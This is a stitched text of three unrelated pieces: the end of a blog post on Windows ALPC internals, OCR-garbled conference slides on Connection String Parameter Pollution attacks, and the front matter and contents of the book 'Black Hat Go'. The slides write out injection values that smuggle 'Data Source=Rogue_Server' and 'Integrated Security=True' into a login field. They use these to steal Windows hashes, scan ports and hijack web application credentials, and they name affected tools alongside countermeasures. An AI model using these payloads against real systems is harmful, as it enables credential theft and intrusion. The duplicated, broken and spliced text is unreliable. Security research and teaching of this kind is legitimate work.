ALPC can become very powerful as ALPC is ubiquitous within the Windows OS, all of the built-in high privileged processes use ALPC and due to its communication architecture it is an attractive target even from a sandbox perspective. There is much more to ALPC than I have covered in this post. Potentially one could write an entire book about ALPC, but I hope to have at least touched the basics to get you started in getting interested in ALPC. To get a first “Where and how much ALPC is in my PC”-impression I recommend starting ProcMonXv2 (by zodiacon) on your host to see thousands of ALPC events firing in a few seconds. To continue from there you might find my ALPC client and server code useful to play around with ALPC processes and to identify & exploit vulnerabilities within ALPC. If you find yourself coding and/or investigating ALPC make sure to check out the reference section for input on how others dealt with ALPC. Finally as a last word and to conclude my recommendation from the beginning: If you feel like you could hear another voice & perspective on ALPC, I highly recommend to grab another beverage and an enjoy the following hour of Alex Ionescu talk about LPC, RPC and ALPC: https://www.youtube.com/embed/UNpL5csYC1E Appendix A: The use of connection and communication ports When looking into ALPC I initially thought that a server listens on its communication port, which it receives when accepting a client connection via NtAlpcConnectPort. This would have made sense, since it’s called communication port. However, listening for incoming messages on the server’s communication port resulted in a blocking call to NtAlpcSendWaitReceivePort that never came back with a message. So my assumption about the server’s ALPC communication port must have been wrong, which puzzled me, since the client on the other side does get messages on his communication port. I hung on this question for a while until I reached out to Alex Ionescu to ask him about this and I learned that my assumption was indeed incorrect, but to be more precise it has become incorrect over time: Alex explained to me that the idea I had (server listens and sends messages on its communication port) was the way that LPC (the predecessor of ALPC) was designed to work. This design however would force you to listen on a growing number of communication ports with each new client the server accepts. Imagine a server has 100 clients talking to it, then the server needs to listen on 100 communication ports to get client messages, which often resulted in creating 100 threads, where each thread would communicate with a different client. This was deemed inefficient and a much more efficient solution was to have a single thread listening (and sending) on the server’s connection port, where all messages are being send to this connection port. That in turn means: A server accepts a client connection, receives a handle to a client’s communication port, but still uses the server’s connection port handle in calls to NtAlpcSendWaitReceivePort in order to send and receive messages from all connected clients. Does that mean that the server’s communication port is obsolete then (and this was my follow up question to Alex)? His answer, once again, made perfect sense and cleared my understanding of ALPC: A server’s per client communication port is used internally by the OS to tie a message, send by a specific client, to this client’s specific communication port. This allows the OS to tie a special context structure to each client communication port that can be used to identify the client. This special context structure is the PortContext, which can be any arbitrary structure, that can be passed to NtAlpcAcceptConnectPort and which can later be extracted from the any message with the ALPC_CONTEXT_ATTR message attribute. That means: When a server listens on its connection port it receives messages from all clients, but if it wants to know which client send the message, the server can get the port context structure (through the ALPC_CONTEXT_ATTR message attribute), that it assigned to this client upon accepting the connection, and the OS will fetch that context structure from the internally preserved client communication port. This far we can conclude that the server’s per-client communication port is still important for the OS and still has its place and role in the ALPC communication structure. That does, however, not answer the question why the server would actually need a handle to each-clients communication port (because the client’s PortContext can be extracted from a message, which is received by using the connection port handle). The answer here is impersonation. When the server wants to impersonate a client it needs to pass the client’s communication port to NtAlpcImpersonateClientOfPort. The reason for this is that the security context information that are needed to perform the impersonation are bound (if allowed by the client) to the client’s communication port. It would make no sense to attach these information to the connection port, because all clients use this connection port, whereas each client has it own unique communication port for each server. Therefore: If you want to impersonate your clients you want to keep each client’s communication port handle. References Below are a few resources that I found helpful to learn and dig into ALPC. Reference Projects that make use of ALPC https://github.com/microsoft/terminal/blob/main/src/interactivity/onecore/ConIoSrvComm.c pp https://github.com/DownWithUp/ALPC-Example https://github.com/DynamoRIO/drmemory https://github.com/hakril/PythonForWindows https://docs.rs/ https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools https://processhacker.sourceforge.io/doc/ntlpcapi_8h.html https://github.com/bnagy/w32 https://github.com/taviso/ctftool References to ALPC implementation details https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/main/NtApi DotNet/NtAlpcNative.cs https://processhacker.sourceforge.io/doc/ntlpcapi_8h.html https://github.com/hakril/PythonForWindows/blob/master/windows/generated_def/windef.p y Talks about ALPC Youtube: SyScan’14 Singapore: All About The Rpc, Lrpc, Alpc, And Lpc In Your Pc By Alex Ionescu Slides: SyScan’14 Singapore: All About The Rpc, Lrpc, Alpc, And Lpc In Your Pc By Alex Ionescu Youtube: Hack.lu 2017 A view into ALPC-RPC by Clement Rouault and Thomas Imbert Slides: ALPC Fuzzing Toolkit LPC References: https://github.com/avalon1610/LPC
p Chema Alonso Chema Alonso Informática 64 Informática 64 Connection Strings Connection Strings • Define the way an application connects to Define the way an application connects to data repository • There are connection strings for: • There are connection strings for: – Relational Databases (MSSQL, Oracle, MySQL,…) LDAP Di i – LDAP Directories – Files  – Etc… Databases Connection Strings Databases Connection Strings Data Source = myServerAddress; Data Source = myServerAddress; Initial Catalog = myDataBase; Initial Catalog  myDataBase; User Id = myUsername; Password = myPassword; Google Hacking Google Hacking  Google Hacking Google Hacking  UDL (Universal Data Links) Files UDL (Universal Data Links) Files Credentials Credentials Operating System Accounts Database Credentials Operating System Accounts Data Source =  myServerAddress; Database Credentials Data Source =  myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security =  SSPI/True/Yes; Password = myPassword; Integrated Security = No; SSPI/True/Yes; Users autheticated by Web App Web application manages the login process Syslogins Connection string 1.‐ Web applicaton connects using its credentials to the credentials to the database. 2.‐ Asks user login i f ti Custom users table information. 3.‐ Checks login information about info Select id from users stored in custom users table. Database Engine App running on Web Server Users autheticated by Database Database engine manages the login process 1.‐ Web application asks for credentials. 2 i i Syslogins Connection string 2.‐ A connection string is composed with the credentials to connect to the database. 3.‐ Roles and permits are limited by the user sed in the connection used in the connection string Database Engine App running on Web Server Connection String Attacks Connection String Attacks • It´s possible to inject parameters into connection It s possible to inject parameters into connection strings using semi colons as separators Data Source = myServerAddress; I iti l C t l D t B Initial Catalog = myDataBase; Integrated Security = NO; User Id = myUsername; Password = myPassword; Encryption = Off; ConnectionStringBuiler ConnectionStringBuiler • Available in .NET Framework 2.0 • Build secure connection strings using parameters • It´s not possible to inject into the connection string Are people aware of this? Are people aware of this? Connection String Parameter Pollution Connection String Parameter Pollution • The goal is to inject parameters in the connection  e goa s to ject pa a ete s t e co ect o string, whether they exist or not • Had duplicated a parameter, the last value wins • This behavior allows attackers to re‐write  completly the connection string, therefore to  manipulate the way the appliation will work and  how should be the it authenticated Pollutionable Behavior Pollutionable Behavior Param1=Value A Param2=Value B Param1=Value C Param2=Value D Param1=Value A Param2=Value B Param1=Value C Param2=Value D DBConnection Object Param1 Param1 Param2 What can be done with CSPP? Rewrite a parameter Data Source=DB1 UID=sa Data Source=DB2 password=Pwnd! Data Source=DB1 UID=sa Data Source=DB2 password=Pwnd! DBConnection Object DataSource DataSource UID password Scanning the DMZ Scanning the DMZ Development Database 1 Finnacial Database Test  Database Forgotten Database Web app I t t Production Data Source FW vulnerable  to CSPP Internet Production Database Port Scanning a Server Port Scanning a Server DataSource DB1,80 DB1,21 DataSource FW Web app vulnerable  to CSPP Internet Production Database DB1,25 DB1 1445 to CSPP Server DB1,1445 What can be done with CSPP? dd Add a parameter Data Source=DB1 UID=sa Integrated Security=True password=Pwnd! DBConnection Object Data Source=DB1 UID=sa Integrated Security=True password=Pwnd! DataSource UID password password CSPP Attack 1: Hash stealing CSPP Attack 1: Hash stealing 1 ‐ Run a Rogue Server on an accessibl IP address: 1. Run a Rogue Server on an accessibl IP address: Rogue_Server 2 Activate a sniffer to catch the login process 2.‐ Activate a sniffer to catch the login process Cain/Wireshark 3.‐ Duplicate Data Source parameter Data_Source=Rogue_Server 4.‐ Force Windows Integrated Authentication Integrated Security=true g y CSPP Attack 1: Robo de Hash CSPP Attack 1: Robo de Hash Data source = SQL2005; initial catalog = db1; Data source   SQL2005; initial catalog   db1; Integrated Security=no; user id=+’User_Value’+;  Password=+’Password Value’+; Password=+ Password_Value +;  D t SQL2005 i iti l t l db1 Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data  S R S Source=Rogue_Server;  Password=;Integrated Security=True;  CSSP 1:ASP.NET Enterprise Manager CSSP 1:ASP.NET Enterprise Manager CSPP Attack 2: Port Scanning CSPP Attack 2: Port Scanning 1 ‐ Duplicate the Data Source parameter setting 1. Duplicate the Data Source parameter setting on it the Target server and target port to be scanned scanned.  Data_Source=Target_Server,target_Port 2 Check the error messages: 2.‐ Check the error messages: ‐ No TCP Connection ‐> Port is opened ‐ No SQL Server ‐> Port is closed ‐ SQL Server ‐> Invalid Password CSPP Attack 2: Port Scanning CSPP Attack 2: Port Scanning Data source = SQL2005; initial catalog = db1; Data source   SQL2005; initial catalog   db1; Integrated Security=no; user id=+’User_Value’+;  Password=+’Password Value’+; Password=+ Password_Value +;  D t SQL2005 i iti l t l db1 Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data  S T t S T t P t Source=Target_Server, Target_Port;  Password=;Integrated Security=True;  CSPP 2: myLittleAdmin CSPP 2: myLittleAdmin Port is Opened Port is Opened CSPP 2: myLittleAdmin CSPP 2: myLittleAdmin Port is Closed Port is Closed CSPP Attack 3: Hijacking Web Credentials CSPP Attack 3: Hijacking Web Credentials 1 ‐ Duplicate Data Source parameter to the 1. Duplicate Data Source parameter to the target SQL Server Data Source=Target Server Data_Source=Target_Server 2.‐ Force Windows Authentication Integrated Security=true 3.‐ Application pool in which the web app is pp p pp running on will send its credentials in order to log in to the database engine. g g CSPP Attack 3: Hijacking Web Credentials CSPP Attack 3: Hijacking Web Credentials Data source = SQL2005; initial catalog = db1; Data source   SQL2005; initial catalog   db1; Integrated Security=no; user id=+’User_Value’+;  Password=+’Password Value’+; Password=+ Password_Value +;  D t SQL2005 i iti l t l db1 Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data  S T t S Source=Target_Server;  Password=;Integrated Security=true;  CSPP Attack 3: Web Data Administrator CSPP Attack 3: Web Data Administrator CSPP Attack 3:  l d / l k myLittleAdmin/myLittleBackup CSPP Attack 3: ASP.NET Enterprise Manager CSPP Attack 3: ASP.NET Enterprise Manager Other Databases Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,  although • Port Scanning • Connect to internal/testing/for developing Databases • Oracle supports integrated authority running on Windows  d UNIX/Li and UNIX/Linux servers – It´s possible to perform all described attacks • Hash stealing P t S i • Port Scanning • Hijacking Web credentials – Also it´s possible to elevate a connection to sysdba in order to  shutdown/startup an instance shutdown/startup an instance myLittleAdmin/myLittleBackup myLittleAdmin/myLittleBackup myLittleTools released a secury advisory and a patch about this ASP.NET Enterprise Manager ASP.NET Enterprise Manager • ASP.NET Enterprise Manager is “abandoned”, but it´s  been used in a lot of web Control Panels. • Fix the code yourself Fix the code yourself ASP.NET Enterprise Manager ASP.NET Enterprise Manager • ASP.NET Enterprise Manager is “abandoned”, but it´s  been used in a lot of web Control Panels been used in a lot of web Control Panels. h lf • Fix the code yourself ASP.NET Web Data Admistrator ASP.NET Web Data Admistrator ASP Web Data Administrator is secure in CodePlex web site,  but not in  Microsoft web site where is been published an unsecure old version Countermeasures Countermeasures • Harden your firewall a de you e a – Outbound connections • Harden your internal accounts y – Web application – Web server – Database Engine • Use ConnectionStringBuilder • Filter the ;) Questions? Questions? Contacto Chema Alonso  chema@informatica64.com http://www.informatica64.com http://elladodelmal.blogspot.com Palako palakko@lateatral.com Authors Chema Alonso  Manuel Fernández “The Sur” Alejandro Martín Bailón Antonio Guzmán
Steele, Patten, and Kottmann Black Hat Go Go Programming for Hackers and Pentesters Go Programming for Hackers and Pentesters Black Hat Go explores the darker side of Go, the popular programming language revered by hackers for its simplicity, efficiency, and reliability. It provides an arsenal of practical tactics from the perspective of security prac- titioners and hackers to help you test your systems, build and automate tools to fit your needs, and improve your offensive security skillset, all using the power of Go. You’ll begin your journey with a basic over- view of Go’s syntax and philosophy and start to explore examples that you can leverage for tool development, including common network protocols like HTTP, DNS, and SMB. You’ll then dig into various tactics and problems that pen- etration testers encounter, addressing things like data pilfering, packet sniffing, and exploit development. You’ll create dynamic, pluggable tools before diving into cryptography, attack- ing Microsoft Windows, and implementing steganography. You’ll learn how to: 🐹 Make performant tools that can be used for your own security projects 🐹 Create usable tools that interact with remote APIs 🐹 Scrape arbitrary HTML data 🐹 Use Go’s standard package, net/http, for building HTTP servers 🐹 Write your own DNS server and proxy 🐹 Use DNS tunneling to establish a C2 channel out of a restrictive network 🐹 Create a vulnerability fuzzer to discover an application’s security weaknesses 🐹 Use plug-ins and extensions to future-proof products 🐹 Build an RC2 symmetric-key brute-forcer 🐹 Implant data within a Portable Network Graphics (PNG) image. Are you ready to add to your arsenal of secu- rity tools? Then let’s Go! About the Authors Tom Steele, Chris Patten, and Dan Kottmann share over 30 years in penetration testing and offensive security experience, and have deliv- ered multiple Go training and development sessions. (See inside for more details.) “Everything necessary to get started with Go development in the security space” — HD Moore, Founder of the Metasploit Project and the Critical Research Corporation THE FINEST IN GEEK ENTERTAINMENT™ www.nostarch.com “I LIE FLAT.” This book uses a durable binding that won’t snap shut. FSC FPO Price: $39.95 ($53.95 CDN) Shelve In: COMPUTERS/SECURITY Tom Steele, Chris Patten, and Dan Kottmann Foreword by HD Moore Black Hat Go BLACK HAT GO BLACK HAT GO Go Programming for Hackers and Pentesters by Tom Steele, Chris Patten, and Dan Kottmann San Francisco BLACK HAT GO. Copyright © 2020 by Tom Steele, Chris Patten, and Dan Kottmann. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior written permission of the copyright owner and the publisher. ISBN-10: 1-59327-865-9 ISBN-13: 978-1-59327-865-6 Publisher: William Pollock Production Editor: Laurel Chun Cover Illustration: Jonny Thomas Interior Design: Octopod Studios Developmental Editors: Frances Saux and Zach Lebowski Technical Reviewer: Alex Harvey Copyeditor: Sharon Wilkey Compositor: Danielle Foster Proofreader: Brooke Littrel Indexer: Beth Nauman-Montana For information on distribution, translations, or bulk sales, please contact No Starch Press, Inc. directly: No Starch Press, Inc. 245 8th Street, San Francisco, CA 94103 phone: 1.415.863.9900; info@nostarch.com www.nostarch.com Library of Congress Cataloging-in-Publication Data Names: Steele, Tom (Security Consultant), author. | Patten, Chris, author. | Kottmann, Dan, author. Title: Black Hat Go : Go programming for hackers and pentesters / Tom Steele, Chris Patten, and Dan Kottmann. Description: San Francisco : No Starch Press, 2020. | Includes bibliographical references and index. | Summary: "A guide to Go that begins by introducing fundamentals like data types, control structures, and error handling. Provides instruction on how to use Go for tasks such as sniffing and processing packets, creating HTTP clients, and writing exploits."-- Provided by publisher. Identifiers: LCCN 2019041864 (print) | LCCN 2019041865 (ebook) | ISBN 9781593278656 | ISBN 9781593278663 (ebook) Subjects: LCSH: Penetration testing (Computer security) | Go (Computer program language) Classification: LCC QA76.9.A25 S739 2020 (print) | LCC QA76.9.A25 (ebook) | DDC 005.8--dc23 LC record available at https://lccn.loc.gov/2019041864 LC ebook record available at https://lccn.loc.gov/2019041865 No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc. Other product and company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark. The information in this book is distributed on an “As Is” basis, without warranty. While every precaution has been taken in the preparation of this work, neither the authors nor No Starch Press, Inc. shall have any liability to any person or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the information contained in it. About the Authors Tom Steele has been using Go since the version 1 release in 2012 and was one of the first in his field to leverage the language for offensive tooling. He is a managing principal research consultant at Atredis Partners with over 10 years of experience performing adversarial and research-based security assessments. Tom has presented and conducted training courses at numerous conferences, including Defcon, Black Hat, DerbyCon, and BSides. Outside of tech, Tom is also a Black Belt in Brazilian jiujitsu who competes regularly, both regionally and nationally. He owns and operates his own jiujitsu academy in Idaho. Chris Patten is the founding partner and lead consultant of STACKTITAN, a specialized adversarial services security consultancy. Chris has been practicing in the security industry for more than 25 years in various capaci- ties. He spent the last decade consulting for a number of commercial and government organizations on diverse security issues, including adversarial offensive techniques, threat hunting capabilities, and mitigation strate- gies. Chris spent his latest tenure leading one of North America’s largest advanced adversarial teams. Prior to formal consulting, Chris honorably served in the US Air Force, supporting the war-fighting effort. He actively served within the Department of Defense Special Operations Intelligence community at USSOCOM, consulting for Special Operations Groups on sensitive cyber warfare initiatives. Following Chris’s military service, he held lead architect positions at numerous Fortune 500 telecommunication companies, work- ing with partners in a research capacity. Dan Kottmann is a founding partner and lead consultant of STACKTITAN. He has played an integral role in the growth and development of the larg- est North American adversarial consultancy, directly influencing technical trade craft, process efficiency, customer experience, and delivery qual- ity. With 15 years of experience, Dan has dedicated nearly the entirety of his professional career to cross-industry, customer-direct consulting and consultancy development, primarily focused on information security and application delivery. Dan has presented at various national and regional security confer- ences, including Defcon, BlackHat Arsenal, DerbyCon, BSides, and more. He has a passion for software development and has created various open- source and proprietary applications, from simple command line tools to complex, three-tier, and cloud-based web applications. About the Technical Reviewer Alex Harvey has been working with technology his whole life and got his start with embedded systems, robotics, and programming. He moved into information security about 15 years ago, focusing on security testing and research. Never one to shy away from making a tool for the job, he started using the Go programming language and has not looked back. BR IE F CON T E N T S Foreword by HD Moore . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xv Acknowledgments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvii Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xix Chapter 1: Go Fundamentals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Chapter 2: TCP, Scanners, and Proxies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 Chapter 3: HTTP Clients and Remote Interaction with Tools . . . . . . . . . . . . . . . . . . . . . 45 Chapter 4: HTTP Servers, Routing, and Middleware . . . . . . . . . . . . . . . . . . . . . . . . . . 77 Chapter 5: Exploiting DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103 Chapter 6: Interacting with SMB and NTLM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131 Chapter 7: Abusing Databases and Filesystems . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153 Chapter 8: Raw Packet Processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173 Chapter 9: Writing and Porting Exploit Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187 Chapter 10: Go Plugins and Extendable Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217 Chapter 11: Implementing and Attacking Cryptography . . . . . . . . . . . . . . . . . . . . . . 233 Chapter 12: Windows System Interaction and Analysis . . . . . . . . . . . . . . . . . . . . . . 263 Chapter 13: Hiding Data with Steganography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295 Chapter 14: Building a Command-and-Control RAT . . . . . . . . . . . . . . . . . . . . . . . . . 315 Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331 CO N T E N T S IN DE TA IL FOREWORD by HD Moore xv ACKNOWLEDGMENTS xvii INTRODUCTION xix Who This Book Is For . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xx What This Book Isn’t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xx Why Use Go for Hacking? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi Why You Might Not Love Go . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi Chapter Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxii 1 GO FUNDAMENTALS 1 Setting Up a Development Environment. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Downloading and Installing Go . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 Setting GOROOT to Define the Go Binary Location. . . . . . . . . . . . . . . . . . . . 2 Setting GOPATH to Determine the Location of Your Go Workspace . . . . . . . . 2 Choosing an Integrated Development Environment . . . . . . . . . . . . . . . . . . . . 3 Using Common Go Tool Commands . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 Understanding Go Syntax . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 Data Types. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 Control Structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 Concurrency. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 Error Handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 Handling Structured Data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 2 TCP, SCANNERS, AND PROXIES 21 Understanding the TCP Handshake . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 Bypassing Firewalls with Port Forwarding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 Writing a TCP Scanner . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 Testing for Port Availability. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 Performing Nonconcurrent Scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25 Performing Concurrent Scanning. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26 Building a TCP Proxy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32 Using io.Reader and io.Writer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32 Creating the Echo Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35 Improving the Code by Creating a Buffered Listener . . . . . . . . . . . . . . . . . . 37 Proxying a TCP Client . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39 Replicating Netcat for Command Execution . . . . . . . . . . . . . . . . . . . . . . . . 40 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44 x Contents in Detail 3 HTTP CLIENTS AND REMOTE INTERACTION WITH TOOLS 45 HTTP Fundamentals with Go . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 Calling HTTP APIs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 Generating a Request . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 Using Structured Response Parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 Building an HTTP Client That Interacts with Shodan . . . . . . . . . . . . . . . . . . . . . . . . . . 51 Reviewing the Steps for Building an API Client . . . . . . . . . . . . . . . . . . . . . . 51 Designing the Project Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52 Cleaning Up API Calls. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53 Querying Your Shodan Subscription . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54 Creating a Client . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58 Interacting with Metasploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59 Setting Up Your Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59 Defining Your Objective. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61 Retrieving a Valid Token . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62 Defining Request and Response Methods . . . . . . . . . . . . . . . . . . . . . . . . . . 63 Creating a Configuration Struct and an RPC Method. . . . . . . . . . . . . . . . . . 64 Performing Remote Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64 Creating a Utility Program . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67 Parsing Document Metadata with Bing Scraping . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68 Setting Up the Environment and Planning. . . . . . . . . . . . . . . . . . . . . . . . . . 69 Defining the metadata Package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 Mapping the Data to Structs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72 Searching and Receiving Files with Bing . . . . . . . . . . . . . . . . . . . . . . . . . . 73 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76 4 HTTP SERVERS, ROUTING, AND MIDDLEWARE 77 HTTP Server Basics. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78 Building a Simple Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78 Building a Simple Router . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 Building Simple Middleware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80 Routing with the gorilla/mux Package . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81 Building Middleware with Negroni . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 Adding Authentication with Negroni . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86 Using Templates to Produce HTML Responses . . . . . . . . . . . . . . . . . . . . . . . 88 Credential Harvesting. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90 Keylogging with the WebSocket API. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93 Multiplexing Command-and-Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102 5 EXPLOITING DNS 103 Writing DNS Clients. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 Retrieving A Records . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 Processing Answers from a Msg struct . . . . . . . . . . . . . . . . . . . . . . . . . . . 106 Enumerating Subdomains. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107 Contents in Detail xi Writing DNS Servers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117 Lab Setup and Server Introduction. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118 Creating DNS Server and Proxy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130 6 INTERACTING WITH SMB AND NTLM 131 The SMB Package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132 Understanding SMB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132 Understanding SMB Security Tokens . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 Setting Up an SMB Session . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134 Using Mixed Encoding of Struct Fields. . . . . . . . . . . . . . . . . . . . . . . . . . . 135 Understanding Metadata and Referential Fields . . . . . . . . . . . . . . . . . . . . 138 Understanding the SMB Implementation. . . . . . . . . . . . . . . . . . . . . . . . . . 139 Guessing Passwords with SMB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146 Reusing Passwords with the Pass-the-Hash Technique . . . . . . . . . . . . . . . . . . . . . . . . 147 Recovering NTLM Passwords. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150 Calculating the Hash. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150 Recovering the NTLM Hash . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151 7 ABUSING DATABASES AND FILESYSTEMS 153 Setting Up Databases with Docker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154 Installing and Seeding MongoDB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154 Installing and Seeding PostgreSQL and MySQL Databases . . . . . . . . . . . . 156 Installing and Seeding Microsoft SQL Server Databases. . . . . . . . . . . . . . . 157 Connecting and Querying Databases in Go . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158 Querying MongoDB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158 Querying SQL Databases. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 160 Building a Database Miner . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161 Implementing a MongoDB Database Miner . . . . . . . . . . . . . . . . . . . . . . . 164 Implementing a MySQL Database Miner . . . . . . . . . . . . . . . . . . . . . . . . . 166 Pillaging a Filesystem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172 8 RAW PACKET PROCESSING 173 Setting Up Your Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174 Identifying Devices by Using the pcap Subpackage . . . . . . . . . . . . . . . . . . . . . . . . . 174 Live Capturing and Filtering Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175 Sniffing and Displaying Cleartext User Credentials. . . . . . . . . . . . . . . . . . . . . . . . . . 